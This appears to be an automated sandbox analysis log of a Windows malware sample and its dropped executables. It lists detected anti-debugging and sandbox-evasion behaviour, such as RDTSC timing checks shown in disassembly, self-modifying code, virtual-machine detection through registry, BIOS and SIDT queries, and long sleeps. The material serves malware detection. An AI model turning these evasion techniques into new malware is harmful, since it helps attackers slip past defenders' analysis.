Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50227 second address: 4C50239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov edx, esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50239 second address: 4C502E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, DDh 0x00000005 call 00007F08C0CB452Ah 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e sub esp, 2Ch 0x00000011 pushad 0x00000012 pushad 0x00000013 mov ebx, 3D686900h 0x00000018 jmp 00007F08C0CB4539h 0x0000001d popad 0x0000001e popad 0x0000001f push esp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F08C0CB4538h 0x00000027 adc si, B9A8h 0x0000002c jmp 00007F08C0CB452Bh 0x00000031 popfd 0x00000032 jmp 00007F08C0CB4538h 0x00000037 popad 0x00000038 mov dword ptr [esp], ebx 0x0000003b jmp 00007F08C0CB4530h 0x00000040 xchg eax, edi 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F08C0CB4537h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C502E3 second address: 4C502E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C502E9 second address: 4C502ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C502ED second address: 4C502F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C502F1 second address: 4C50303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e movsx ebx, cx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50303 second address: 4C50309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50309 second address: 4C5030D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5030D second address: 4C5031F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov di, cx 0x0000000f mov cl, 71h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50394 second address: 4C50410 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 638ADE06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test al, al 0x0000000c jmp 00007F08C0CB452Dh 0x00000011 je 00007F08C0CB470Bh 0x00000017 pushad 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F08C0CB452Ah 0x0000001f xor si, 8CA8h 0x00000024 jmp 00007F08C0CB452Bh 0x00000029 popfd 0x0000002a mov bx, cx 0x0000002d popad 0x0000002e mov ax, 0EBBh 0x00000032 popad 0x00000033 lea ecx, dword ptr [ebp-14h] 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F08C0CB452Ch 0x0000003d sub ah, 00000008h 0x00000040 jmp 00007F08C0CB452Bh 0x00000045 popfd 0x00000046 popad 0x00000047 mov dword ptr [ebp-14h], edi 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F08C0CB4530h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50410 second address: 4C50416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50416 second address: 4C5041A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50438 second address: 4C5043E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5043E second address: 4C50444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50444 second address: 4C50448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50448 second address: 4C5044C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C504E7 second address: 4C50550 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 call 00007F08C0C91963h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test eax, eax 0x00000011 jmp 00007F08C0C9195Fh 0x00000016 jg 00007F093299F8CDh 0x0000001c jmp 00007F08C0C91966h 0x00000021 js 00007F08C0C919B7h 0x00000027 jmp 00007F08C0C91960h 0x0000002c cmp dword ptr [ebp-14h], edi 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50550 second address: 4C50554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50554 second address: 4C50571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50571 second address: 4C50577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50577 second address: 4C5057B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5057B second address: 4C505C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F09329C243Eh 0x0000000e jmp 00007F08C0CB452Fh 0x00000013 mov ebx, dword ptr [ebp+08h] 0x00000016 jmp 00007F08C0CB4536h 0x0000001b lea eax, dword ptr [ebp-2Ch] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F08C0CB452Ah 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C505C2 second address: 4C505C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C505C8 second address: 4C505DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edx, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx edi, cx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C505DB second address: 4C505E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C505E0 second address: 4C505F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0CB4534h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C505F8 second address: 4C505FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C505FC second address: 4C50637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F08C0CB452Eh 0x0000000e xchg eax, esi 0x0000000f jmp 00007F08C0CB4530h 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007F08C0CB452Dh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50637 second address: 4C5063C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5063C second address: 4C5066E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4537h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F08C0CB4534h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5066E second address: 4C5069F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08C0C9195Ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F08C0C9195Dh 0x00000015 jmp 00007F08C0C9195Bh 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5069F second address: 4C506B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08C0CB4532h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C506B6 second address: 4C506D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 jmp 00007F08C0C9195Eh 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50748 second address: 4C5074E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5074E second address: 4C50752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50752 second address: 4C50756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50756 second address: 4C5002E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a jmp 00007F08C0C91960h 0x0000000f test esi, esi 0x00000011 pushad 0x00000012 mov dx, cx 0x00000015 push esi 0x00000016 pushfd 0x00000017 jmp 00007F08C0C91969h 0x0000001c or ecx, 117EC716h 0x00000022 jmp 00007F08C0C91961h 0x00000027 popfd 0x00000028 pop ecx 0x00000029 popad 0x0000002a je 00007F093299F800h 0x00000030 xor eax, eax 0x00000032 jmp 00007F08C0C6B08Ah 0x00000037 pop esi 0x00000038 pop edi 0x00000039 pop ebx 0x0000003a leave 0x0000003b retn 0004h 0x0000003e nop 0x0000003f mov edi, eax 0x00000041 cmp edi, 00000000h 0x00000044 setne al 0x00000047 xor ebx, ebx 0x00000049 test al, 01h 0x0000004b jne 00007F08C0C91957h 0x0000004d jmp 00007F08C0C91A49h 0x00000052 call 00007F08C4F390D0h 0x00000057 mov edi, edi 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c pushfd 0x0000005d jmp 00007F08C0C91969h 0x00000062 jmp 00007F08C0C9195Bh 0x00000067 popfd 0x00000068 pushad 0x00000069 popad 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5002E second address: 4C50034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50034 second address: 4C50061 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F08C0C9195Eh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50061 second address: 4C50065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50065 second address: 4C50081 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91968h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50081 second address: 4C500D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB452Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F08C0CB4536h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F08C0CB4530h 0x00000016 xchg eax, ecx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007F08C0CB452Ch 0x00000020 adc ch, 00000028h 0x00000023 jmp 00007F08C0CB452Bh 0x00000028 popfd 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C500D9 second address: 4C500E6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov eax, 41E125B1h 0x0000000d rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9D3DF3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9D3E96 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9D12C6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B8FB8B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: BF064A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Special instruction interceptor: First address: 19EB0E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Special instruction interceptor: First address: 19EBF7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Special instruction interceptor: First address: 3490EA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Special instruction interceptor: First address: 19C3BA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Special instruction interceptor: First address: 35B54D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Special instruction interceptor: First address: 3D4378 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Special instruction interceptor: First address: 731A55 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Special instruction interceptor: First address: 8D4E36 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Special instruction interceptor: First address: 72F5E2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Special instruction interceptor: First address: 901F69 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 19EB0E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 19EBF7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 3490EA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 19C3BA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 35B54D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Special instruction interceptor: First address: 961C3A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Special instruction interceptor: First address: A3DA15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Special instruction interceptor: First address: BE662F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Special instruction interceptor: First address: A3B5BE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Special instruction interceptor: First address: BEED09 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 3D4378 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Special instruction interceptor: First address: C739A9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Special instruction interceptor: First address: E93DF3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Special instruction interceptor: First address: E93E96 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Special instruction interceptor: First address: E912C6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Special instruction interceptor: First address: 104FB8B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Special instruction interceptor: First address: 10B064A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Special instruction interceptor: First address: C81A55 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Special instruction interceptor: First address: E24E36 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Special instruction interceptor: First address: C7F5E2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Special instruction interceptor: First address: E51F69 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Special instruction interceptor: First address: EB1C3A instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Memory allocated: 50F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Memory allocated: 5360000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Memory allocated: 7360000 memory reserve | memory write watch Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Code function: 3_2_04A00E3E rdtsc 3_2_04A00E3E
Contains functionality to detect virtual machines (SIDT)
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00BD3904 sidt fword ptr [esp-02h] 6_2_00BD3904
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 2181 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 369 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 890 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 819 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1920 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Window / User API: threadDelayed 648
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe API coverage: 3.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 7116 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5972 Thread sleep time: -58029s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5236 Thread sleep count: 2181 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5236 Thread sleep time: -4364181s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3184 Thread sleep count: 369 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3184 Thread sleep time: -11070000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6036 Thread sleep count: 890 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6036 Thread sleep time: -1780890s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 340 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4236 Thread sleep count: 819 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4236 Thread sleep time: -1638819s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5532 Thread sleep count: 1920 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5532 Thread sleep time: -3841920s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe TID: 7064 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe TID: 5708 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe TID: 280 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe TID: 5576 Thread sleep time: -30000s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 12_2_00FCDBBE
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F9C2A2 FindFirstFileExW, 12_2_00F9C2A2
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD68EE FindFirstFileW,FindClose, 12_2_00FD68EE
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 12_2_00FD698F
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00FCD076
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00FCD3A9
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_00FD9642
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_00FD979D
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 12_2_00FD9B2B
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD5C97 FindFirstFileW,FindNextFileW,FindClose, 12_2_00FD5C97
